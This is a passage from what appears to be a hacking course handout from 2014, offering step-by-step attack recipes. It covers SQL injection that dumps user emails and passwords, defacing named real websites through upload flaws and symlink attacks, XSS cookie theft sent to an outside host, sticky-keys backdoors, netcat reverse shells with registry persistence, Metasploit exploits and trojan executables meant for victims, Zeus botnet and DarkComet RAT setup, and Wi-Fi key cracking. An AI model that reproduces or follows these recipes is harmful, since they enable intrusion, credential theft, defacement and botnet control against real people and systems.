msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'

Could not query:XPATH syntax error: ' :SS_orders'

Could not query:XPATH syntax error: ' :SS_products'

Could not query:XPATH syntax error: ' :SS_products2'

Could not query:XPATH syntax error: ' :SS_special_offers'

Could not query:XPATH syntax error: ' :categories'

Could not query:XPATH syntax error: ' :details'

Could not query:XPATH syntax error: ' :productrange'

Could not query:XPATH syntax error: ' :recipes'

December 31, 2014


Could not query:XPATH syntax error: ' :visitors'

=====================================================================

Note : Convert table name to HEX [String to hex conversion]

Eg : details : 64657461696c73 or 0x64657461696c73

=====================================================================

Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select

concat(0x3a,column_name) from information_schema.columns WHERE

table_name=0x64657461696c73 limit 0,1)))--+


extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from

/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit

0,1)))--+

msg: Could not query:XPATH syntax error: ' :cust_firstname'

----------------------------------------------------------------

Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...

Respectively :~ For 2,3,4,5,6,7,8.....

msg: Could not query:XPATH syntax error: ' :cust_lastname'

msg: Could not query:XPATH syntax error: ' :cust_country'

msg: Could not query:XPATH syntax error: ' :cust_zip'

msg: Could not query:XPATH syntax error: ' :cust_state'

msg: Could not query:XPATH syntax error: ' :cust_city

msg: Could not query:XPATH syntax error: ' :cust_address'

msg: Could not query:XPATH syntax error: ' :cust_phone'

=====================================================================

Note : I got

Table -> users

Columns -> Password & Email

December 31, 2014


So,

=====================================================================

Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select

concat(email,0x3a,password) from users limit 0,1)))--+


extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from

/*!users*/ limit 0,1)))--+

msg: Could not query:XPATH syntax error: ' :email:password'

=====================================================================

4. DNN Portal Hacking 1 : inurl:tabid/176/Default.aspx

2 : inurl:"/portals/0/" site:.com

3 : inurl:/tabid/36/language/en-US/Default.aspx

4 : inurl:/portals/0/default.aspx

5 : DNN(Link Gallary)

6 : inurl:/tabid/36/language/en-US/Default.aspx

7 : inurl:fcklinkgallery.aspx

step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with

above vanulabilities ]

> Replace : /tabid/768/productid/92/default.aspx

> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx

step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx

step 3 : click on File (A File On Your Site) and then replace the link with -->

javascript:__doPostBack('ctlURL$cmdUpload','')

step 4 : up will see the uploading button. Upload { shell , Deface it , put your signature}

step 5: http://www.parallax.com/portals/0/shadow.txt

5. Simlink Attack

1] Upload shell 404.php on your hacked website and root the webserver.

2] Upload contact.php & database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php

December 31, 2014


> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php

3] go to [sec. info] in your shell then [readable : etc/passwd <view>]

4] copy all username & passwd from [ etc/passwd ]

5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.

6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/

7] on configweb page [ you have some text that contain user & password ] [ these files are

reverse or linked website details ]

8] Now login to them using database.php [ change password in database ]

9] login to main site then and deface there index.php page.

6. XSS

1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

2. <IMG SRC="javascript:alert('XSS');">

3. <IMG SRC=javascript:alert('XSS')>

4. <IMG SRC=JaVaScRiPt:alert('XSS')>

5. <IMG SRC=JaVaScRiPt:alert('XSS')>

6. <IMG SRC=javascript:alert("XSS")>

7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

11. <IMG

SRC=javascript:al&#10

1;rt('XSS')>

12. <IMG

SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#

0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040

&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

13. <IMG SRC="javascript:alert('XSS');">

==========================================================================

Hands On Series – Cross Site Scripting (XSS) Part 1

In this episode we start dealing with Cross Site Scripting (XSS) attacks.

December 31, 2014


CSS = Cascading Style Sheets

XSS = Cross Site Scripting

Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users

browsers.

A key element to XSS is that one user can submit data to a website that will later be displayed for other

users.

It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web

defacement rather then attacking other users.

The hackme site has been updated and improved (more about that in a moment)

and now includes a section for XSS which we will be using in this episode.

As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the

hacking test site and

have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Lets start by trying to somehow add an attribute so that when someone mouses over the name, the

javascript will be executed.

----------------------------------------------------------------------------------------------------------------------------

Attack #1 – Against Email Address

=================================

Attack 1: Original

<a href=”mailto:[email protected]“>John Doe</a>

Attack 1: Desired addition

onmouseover=”alert(„Hacked‟);”

Attack 1: Desired Result

<a href=”mailto:[email protected]” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>

Attack 1: Attack String

[email protected]” onmouseover=”alert(„Hacked‟);

December 31, 2014


Attack 1: Actual Result

<a href=”mailto:[email protected]” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>

Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.

At this point we have proven that we can insert code onto the site and have it executed by a web

browser!

This attack is only executed based on a user event (the user mousing over the link)

Lets try creating a script tag, which will get executed while the page is loaded by the browser (so

basically right away).

-----------------------------------------------------------------------------------------------------------------------------

Attack #2 – Against Email Address

=================================

Attack 2: Original

<a href=”mailto:[email protected]“>John Doe</a>


<script>alert(„Hacked‟);</script>


<a href=”mailto:[email protected]”><script>alert(„Hacked‟);</script><”>Bob Smith</a>


[email protected]”><script>alert(„Hacked‟);</script><”


<a href=”mailto:[email protected]”><script>alert(„Hacked‟);</script><”“>Bob

Smith</a>

Failure! No popup takes place.

Notice the Actual Result does not match the Desired Result.

This is because of htmlentities as mentioned in the helper notes.

-----------------------------------------------------------------------------------------------------------------------------

Attack #3 – Against Title

=========================

December 31, 2014


Attack 3: Original

<td>Works Great</td>


<script>alert(„Hacked‟);</script>


<td><script>alert(„Hacked‟);</script></td>


Works Great<script>alert(„Hacked‟);</script>


<td>Works Great<script>alert('Hacked');</script></td>

Failure! No popup takes place.

This almost worked, except that the single and double quotes get escaped, so lets try making something

that doesnt need quotes.

-----------------------------------------------------------------------------------------------------------------------------


=========================

In the alert function lets use the global variable document.domain in the attack string.


Works Great<script>alert(document.domain);</script>


<td>Works Great<script>alert(document.domain);</script></td>

Success! A popup should appear that says hackme.ntobjectives.com

Maybe this isnt convincing enough… lets try cookies.

-----------------------------------------------------------------------------------------------------------------------------


=========================

December 31, 2014



Works Great<script>alert(document.cookie);</script>


<td>Works Great<script>alert(document.cookie);</script></td>

Success! A popup should appear that shows all your cookie data.

Theres nothing stopping the hacker from having the user send this data to their server.

I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure

this isnt an attack point.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123

You should be shown that abc=123

This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

-----------------------------------------------------------------------------------------------------------------------------


=========================

Attack 6: Original

<td>Works Great</td>


<script>window.location=‟http://hackme.ntobjectives.com/xss/bin.php?var=‟+document.cookie;</script

>

We have already established that I cannot insert those single quotes that I need around the URL, so we

need to enter into a little more advanced methods.

Using the javascript function String.fromCharCode allows me to get around needing quotes by turning

each decimal value into its character, and it doesnt require any quotes.

December 31, 2014


So we just convert our desired string into decimal first

This:

http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,

99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes


Works

Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101

, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,

105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>


<td>Works

Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101

, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,

105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing

you all the data from your cookies.

If this were an attackers site, it would just collect the info and pass you back to the page you came from,

and its unlikely you would have ever noticed that your session information had been stolen.

December 31, 2014


December 31, 2014


7. Shell Uploading & Defacement

December 31, 2014


8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]

December 31, 2014


9. Manipulating Parameters Step1 : open site and search for hidden elements...

December 31, 2014


Step2 : Change the hidden elements value using temper data or developer toolkit [

Firefox add-ons ]

December 31, 2014


10. Dictionary Attack

December 31, 2014


11. Heart bleed

December 31, 2014


12. DNS Zone Transfer

December 31, 2014


December 31, 2014


13. Brute Force Attack Against SCADA Systems

December 31, 2014


December 31, 2014


System Hacking 1. ADS [AlterNet Data Streaming]

Practical Guide to Alternative Data Streams in NTFS step1 : type "tab.mp4" >C:\hack\tab.mp4:tab.mp4

go to location --> C:\hack\

type command : i. dir -> it show all stuff in directory then conform that tab.mp4 has been made with 0kb

size.......then ,

ii. start vlc tab.mp4:tab.mp4

To deduct ads file use (Only recovery tools can find these files): i. ADS Spy v1.11

ii. get my data back

2. System Password Hacking & Cracking ophCrack (Crack password)

John The Ripper (Crack password)

Cain & Able (Crack password)

slax work (Crack password)

hiren boot cd (Remove password)

ERD commander (till win 7) [reset password & repair & recovery of windows form boot

sector virus] (Remove password)

Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)

Kon-Boot (Login Page Bypassing)

3. Back Doors

1. Win-XP

> c:windows/system32

> copy CMD.EXE

> Change Name to " sethc.exe "

> Put back sethc.exe to " system32 " folder

December 31, 2014


2. Win-7

> c:windows/system32

> look for " ULTRAMAN.EXE " change its permission , ownership and name .

> copy cmd .exe to desktop and rename it to " ULTRAMAN.EXE " put back it in

system32 folder.

NOW :

> at login page press shift 5 times.

> cmd will pop up type command

> net user <username> /del , /add , * [ remove and reset password ]

3. NetCat : [ Netcat can simply be described as a tool that can read and write to

TCP and UDP ports. This dual functionality suggests that Netcat runs in two

modes:“client” and “server”. ]

I. Connect to TCP/UDP Ports

> localhost ~ # nc -h [ Help ]

> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]

Bind Shell

> Victim / User1 :

> C:\>nc -lvvp 4444 -e cmd.exe

> Attacker / User2 :

> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]

Reverse Shell

> User1 :

> C:\>nc -lvvp 4444

> User2 :

> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending

his "shell" to User1 ]

December 31, 2014


Uploading Netcat After Hacking With Metasploit :

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\

meterpreter > reg enumkry -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\Run -v

NETCAT -d C:\\WINDOWS\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed

sucessfully on victim os no need to exploit use commands :]

root@bt:~# nc <victim ip> <port>

root@bt:~# nc 192.168.217.141 1234

4. Steganography

1. hiding text on image

> run

> cmd

> cd desktop

> copy /b image.jpg+password.txt final_image.jpg

2. OpenPuff

> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation

December 31, 2014


December 31, 2014


5. Detect Steganography

Backtrack Forensics: Steganoghraphy

Menu: Forensics -> Forensic Analysis Tools

Directory: /usr/local/bin/

stegbreak

stegcompare

stegdeimage

stegdetect

stegdecect is a tool to detect steganography in image files, it supports different methods, which

used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows),

invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is

used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.

Before we start to use the tools we need an image, which has some hidden content. Let's review a

few hiding apps before using stegdetect. As I didn't found any preinstalled in BT, so I installed

steghide for first, which can hide content in jpeg, bmp, wav, au files.

Using steghide:

apt-get install steghide - installation

steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)

steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide

mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't

compress data

steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the

previous but w/ compression

steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file

The bad news is that stegdetect won't detect steghide algorithm. Despite the fact, I tried it to ses

what happens.

December 31, 2014


Using stegdetect:

stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):

j - Tests if information has been embedded with jsteg.

o - Tests if information has been embedded with outguess.

p - Tests if information has been embedded with jphide.

i - Tests if information has been hidden with invisible secrets.

f - Tests if information has been hidden with F5.

F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow

detection algorithm.

a - Tests if information has been added at the end of file, for example by camouflage or

appendX.

stegdetect -s[number] steg.jpg - setting sensitivity

Actually setgdetect found jphide for the original and the created image as well, so it's clearly

false positive.

I tried to see what stegbreak can do, and created a list of password where I put only one line, the

correct password.

stegbreak -f passlist.txt steg.jpg

I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or

directory"

I downloaded the source and placed the ini file in the said location, but you can also download it

from here.

After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,

however it's a known bug.

Second I tried outguess, which can hide info in jpeg files.

December 31, 2014


Using Outguess :

apt-get install outguess

outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in

IMG_4422.JPG

Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),

even if increasing the sensitivity, as you can see:

My last try was with jphide, I used the windows version, as had no luck with installing the one

for Linux. It can be downloaded from here.

As you can see stegdetect can detect it, when increasing sensitivity, but as it claims the same

thing for the original image, so...

stegcompare can compare the original and the image which stores information, but I couldn't

figure out what the output means.

tegdeimage - not sure about what it should do, also gives the following error:

"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"

looking at the source code:

73 if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)

74 return;

it is clear that it will never run, unless you have such an image.

Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find

steganography correctly.

Official website for steghide: http://steghide.sourceforge.net/

Official website for stegdetect and outguess: http://www.outguess.org/

Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html

December 31, 2014


Stegdetect :

December 31, 2014


Steghide :

stegcompare :

December 31, 2014


outguess :

6. Bypassing Login Page Windows With Backtrack

Make a bootable backtrack pendrive

Boot the system and open backtrack

Open Terminal

mkdir /root/Desktop/p7771 [ Create any folder ]

fdisk -l

mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]

ls -la /root/Desktop/p7771/

cd /pentest/password/chntpw

./chntpw -i Desktop/p7771/Windows/System32/config/sam

Press - 1 [ Edit User Data And Password ]

Press - 1 [ Clear Blank User Password ]

Press - q [ Quit ]

Press - y [ Write hive file ? ]

December 31, 2014


December 31, 2014


Malwares 1. Botnet I ] How To Find Cpanel :

A] we need a compromised website with Symlink attack eg :

link:www.site.com/akismet/configweb [ it has all password files ]

1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/

'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]

2] upload cpanal.php to your shell.

3] copy all password to your cpanal.php

4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail

5] copy all user to your cpanel.php

6] click on start it will show you list of active cpanel

7] find website from reverse ip lookup

8] default port for cpanel :2082 [ www.site.com:2082 ]

II ] Configuring Zeus Botnet :

A ] Creating IRC Server :

1] open c-panel

2] go into public folder

3] create folder [ Eg : XXX ]

4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC

Server ]

5] extract the Zeus.rar to server.

6] open www.site.com/XXX/install/index.php

NOW : Now we will setup a database and link it with our IRC server.

B ] Creating Database :

7] go into cpanel & click into my sql database wizard

8] crate a new database and user

Eg : Yahoo >> Next

Eg : User Name = yahoo

Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]

December 31, 2014


9] Click on create user.

10] Go to = www.site.com/XXX/install/index.php

> give password that has been generated.

11] Come back to your database page and assign/give permision or click on all

privilidge.

12] Copy username & database name and go to -->

www.site.com/XXX/install/index.php [ Under Mysql Server ]

> give the user name.

> give the database name.

13] Click on next step [ Database will be created and linked with IRC server ]

14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->

www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]

15] Now create encryption key Eg : 123123 [ Under Options : ]

16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go

back to your folder " XXX " [ Where you have uploaded your IRC ]

> Right click on --> system [ Folder ]

> Change Permission to --> 777 [Read-Write-Exicute]

17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "

Install "

18] Now go to --> www.site.com/XXX/cp.php

> Username = admin

> Password = abc123

C ] Configuring Bot :

19] Open & Extract "client.rar" .

20] Run "gzero.exe"

21] Click On Builder > click on " edit ".

> configuration file of bot will be opened.

> replace all links with your server path -- > www.site.com/XXX/

> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->

http://www.site.com/xxx/cfg.bin

> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>

http://www.site.com/xxx/tr.exe

> Eg. http://www.rumahbaut.com/xxx/gate.php --->

http://www.site.com/xxx/gate.php

> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->

http://www.site.com/xxx/cfg1.bin

> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]

22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT

Then ,

December 31, 2014


23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe

D] Uploading The Bot :

24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file

[ www.site.com/ ]

25] Upload Both file that u have created "BOT" & "tr.exe"

NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your

shell. [wso.php]

December 31, 2014


2. Virus Virus Creator

Sonic Bat

TeraBit

Infection Virus Maker

Deadline Virus Maker

JPS Virus Maker

Jkymmel Batch Virus Creator

WolfDEM's

Virus Matic

Necro Virus Maker

December 31, 2014


3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ] Dark Comet [ Setting Up Dark Comet RAT ]

1. Run client.exe

> allow connection

> Edit Server

> main setting

> connection setting

> Ip: Get local IP < Your IP>

> port : <any>

> Server Setup

> melt server

> Server Shield

> Anti Virtual Box

> Icon Setting

> Generate Server

> active keylogger

> create server

> click on connection.

> port listining mode

2. Give app to victim

3. Control Its PC

December 31, 2014


December 31, 2014


Black Shades

JSpy

Pussy RAT

http://jspy.net/jspy/

http://pussyrat.com/

December 31, 2014


Bozok RAT

Poison lvy Rat

Nj Rat

http://ss-rat.blogspot.com/

http://www.poisonivy-rat.com/

http://ge.tt/85SH60t

December 31, 2014


DameWare RAT

jRAT

http://www.dameware.com/products/remote-support/product-features/remote-administration-tools.aspx

http://jspy.net/jspy/

December 31, 2014


Cyber Gate

4. Worms

A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms

spread from computer to computer, but unlike a virus, it has the capability to travel without any

human action. A worm takes advantage of file or information transport features on your system,

which is what allows it to travel unaided.

The biggest danger with a worm is its capability to replicate itself on your system, so rather than

your computer sending out a single worm, it could send out hundreds or thousands of copies of

itself, creating a huge devastating effect. One example would be for a worm to send a copy of

itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself

out to everyone listed in each of the receiver's address book, and the manifest continues on down

the line.

Due to the copying nature of a worm and its capability to travel across networks the end result in

most cases is that the worm consumes too much system memory (or network bandwidth),

causing Web servers, network servers and individual computers to stop responding. In recent

worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to

tunnel into your system and allow malicious users to control your computer remotely.

http://www.cyber-planet.org/

http://www.webopedia.com/TERM/S/system.html

http://www.webopedia.com/TERM/N/network.html

http://www.webopedia.com/TERM/S/server.html

December 31, 2014


Penetration testing Types Of Testing :

1. White-Box Testing

2. Black-Box Testing

3. Grey-Box Testing

4. Internal Testing

5. External Testing

Process Of Pen-testing :

1. Information gathering

2. Scanning & Banner Grabbing

3. Vulnerability Scanning

4. Exploitation ( Obtaining Access )

5. Maintaining Access & Erasing Evidence

Tools :

1. Metasploit

2. Core-impact

METASPLOIT

Vulnerability : A weakness that allows an attacker to compromise the secrity of

system.

Exploits : Doing the step by step procedure of gathering information

Payload : the process to gain access which is blocked by user

Encoders : The process to remove tracks.

December 31, 2014


Need for Metasploit

1. difficult to manage, update, customize dozen of exploits available on internet for

different technologies

2. customization of exploits will be time consuming & one also need high skills do

to same

METASPLOIT

Testing framework for Penetration testing contains 1300+exploit

http://cve.mitre.org

rapid7.com

www.exploit-db.com

December 31, 2014


I. Windows XP

To open Metasploit in kali Linux or backtrack use command : msfconsole

RCE ( Netapi ) ( Remote Code Execution ) [Win XP SP-2,3 -> vulnerable OS]

msfconsole

search netapi

use exploit/windows/smb/ms08_067_netapi [ CVE NO = 067 ]

show options

set RHOST [TARGET IP] -> 192.168.1.20

set PAYLOAD windows/meterpreter/bind_tcp

OR

set PAYLOAD windows/meterpreter/reverse_tcp [ Test other payload also ]

set LHOST 192.168.1.150 [Attacker Ip Address]

set LHOST [MY IP ADDRESS]

exploit

So we got successful meterpreter session It means u remotely login to xp-os.

now use help command for listing meterpreter commands.

Meterpreter Commands

meterpreter > getuid

meterpreter > ps

meterpreter > migrate 1444 [ migrate to that process which have admin privileges. ]

meterpreter > idletime

meterpreter > hashdump

meterpreter > screenshot

meterpreter > shell

> c:\> net user root *

>c:\> exit

December 31, 2014


Uploading Netcat :

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\

meterpreter > reg enumkry -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\Run -v

NETCAT -d C:\\WINDOWS\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"

meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run

Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed successfully on victim

os no need to exploit use commands :]

root@bt:~# nc <victim ip> <port>

root@bt:~# nc 192.168.217.141 1234

More Commands :

meterpreter > cat <file name>

meterpreter > download C:\\<file name>

meterpreter > upload C:\\<file name>

meterpreter > searrch -d C:\\ *d

meterpreter > keyscan_start

meterpreter > keyscan_dump

meterpreter > keyscan_stop

meterpreter > uictl disable keybord

meterpreter > uictl enable keybord

meterpreter > run [ press tab show many more commands ]

meterpreter > run vnc

Creating Backdoor :

meterpreter > run metsvc [Maximum Virus And Trojens Work On 31337 Port]

meterpreter > background [ to go back ]

December 31, 2014


NOTE : What if our connection break or victim patch his vulnerability to connect with our

"Backdoor" :-

use exploit/multi/handler

set payload/windows/metsvc_bind_tcp

show options

set rhost < victim >

set lport 31337 ---------> because our backdoor is working on 31337 port.

exploit

meterpreter > run

meterpreter >

December 31, 2014


December 31, 2014


II. Windows Server 2003

Windows Server Hacking [ 2003 SP - 1,2 ]

RCE ( Netapi ) ( Remote Code Execution ) [ windows server 2003 SP-1,2,platinum ]

msfconsole

exploit/windows/smb/ms06_040_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [MY IP ADDRESS]

set RHOST [TARGET IP]

exploit

III. Windows 7

Windows 7 Hacking

(dot)EXE [ Trojan ] [ Hack Any Windows Os ]

root@#~/ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444

x > /root/12345.exe

NOTE : Give 12345.exe [ virus ] to victim



show options

set lhost < Our Ip >

set lport 4444 ---------> because our virus is working on 4444 port

exploit

meterpreter > run

December 31, 2014


December 31, 2014


IV. Browser Exploits Autopwn [ combo of may exploits ] [See also : Java bean jmx17_jmxbean ]

use auxiliary/server/browser_autopwn

show options

set LHOST <My Ip >

set SRVHOST < My Server is hosted on my computer so again my ip >

set SRVPORT 80

set URIPATH /

exploit

December 31, 2014


December 31, 2014


V. ARORA Exploit

msf>use exploit/windows/browser/ms10_002_aurora

msf>show options

msf>set URLPATH/

http://192.168.42.131/

msf>show payloads

msf>set payload windows/vncinject/reverse_tcp

msf>show options

msf>set lhost 192.168.17.128

msf>exploit

VI. Windows 8

Attacker 1. start terminal : 2. root@bt:~# msfpayload windows/meterpreter/reverse_tcp Lhost=192.168.17.128

LPORT=4444 x > /root/12345.exe

Now give this 12345.exe <- Virus to victim Then Run, root@bt:~# msfconsole

msf>

msf> use exploit/multi/handler msf> exploit(handler) > set payload windows/meterpreter/reverse_tcp msf> exploit(handler) > show options msf> exploit(handler) > set LHOST 192.168.17.128 msf> exploit(handler) > set LPORT 4444 msf> exploit(handler) > exploit

December 31, 2014


December 31, 2014


VII. DLL Injection

1. Hack Windows 7 with Metasploit using Kali Linux.

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

msfconsole

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf > set payload windows/meterpreter/reverse_tcp

msf > show options

msf > set SRVHOST 192.168.31.20

msf > set LHOST 192.168.31.20

msf > exploit

msf > sessions

msf > sessions -i 1

meterpreter >

December 31, 2014


Buffer Overflow #include<stdio.h>

void main()

{

char *name;

char *command;

name=(char *)malloc(10);

command=(char *)malloc(128);

printf("address of name is : %d\n",name);

printf("address of command is : %d\n",command);

printf("Difference between address is : %d\n",command-name);

printf("Enter your name");

gets(name);

printf("Hello %s\n",name);

system(command);

}

root@kali:~#

root@kali:~# gcc buffer.c -o buffer

root@kali:~# ./buffer

Eg: Output : 347582347y5823458723453425534523453452345234cat /etc/passwd

1] Buffer Over Flow Attack On orbital_viewer

msfconsole

search bof

search orbital

use exploit/windows/fileformat/orbital_viewer_orb


show options

set LHOST <Our IP>

exploit

exit

Note : Give " msf.orb " to victim now,



show options

December 31, 2014




exploit

meterpreter > run

II. Buffer Overflow In VLC Player

use exploit/windows/fileformat/vlc_modplug_s3m


show options

set LHOST <Our IP>

exploit

exit

Note : Give " msf.s3m " to victim now,



show options



exploit

meterpreter > run

December 31, 2014


December 31, 2014


Wi-Fi Hacking http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

1. WEP / WPA / WPA-2

WEP - Wired Equivalent Privacy

WEP keys are a sequence of hexadecimal digits.

These digits include the numbers 0-9 and the letters A-F.

Some examples of WEP keys are:

1A648C9FE2

99D767BAC38EA23B0C0176D152

The length of a WEP key depends on the type of WEP security (called "encryption")

utilized:

40- or 64-bit WEP: 10 digit key

104- or 128-bit WEP: 26 digit key

256-bit WEP: 58 digit key

WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key

The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-

bit keys used in the WEP system.

Temporal Key Integrity Protocol - TKIP

TKIP employs a per-packet key system that was radically more secure than fixed

key used in the WEP system.

KIP was later superseded by Advanced Encryption Standard (AES).

WPA2 - Wi-Fi Protected Access II

256-bit encryption

using a security key of either 64 hexadecimal digits or a passphrase of up to 63

ASCII characters.

2. Command Line

airmon-ng -> To Put Your Network adapter in monitor mode.

airodump -ng -> Start monitoring and packets sniffing.

aireplay -ng -> For Deauthanticate the user.

aircrack -ng -> To crack the key.

December 31, 2014


SSID - service set identifier (Name of Network)

BSSID - Base Station service set identifier -> BSSIDs Identify Access Points and Their Clients

(AP MAC Address)

Hacking WEP From Backtrack Linux Terminal

step1 : airmon-ng start wlan0

step2 : airodump-ng mon0

step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000

packet

step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0

For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --

ignore-negative-one

step5 : aircrack-ng lab.cap

Hacking WPA & WPA2 From Backtrack Linux Terminal

step1 : airmon-ng start wlan0

step2 : airodump-ng mon0

step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0

step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0

> wait for at least 1 4-way handshake

> > For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70

mon0 --ignore-negative-one

step5 : aircrack-ng -w wordlist lab.cap

December 31, 2014


Hacking WPS From Backtrack Linux Terminal

Reaver : [ crack wep-wpa-wpa2 ]

wash -i mon0

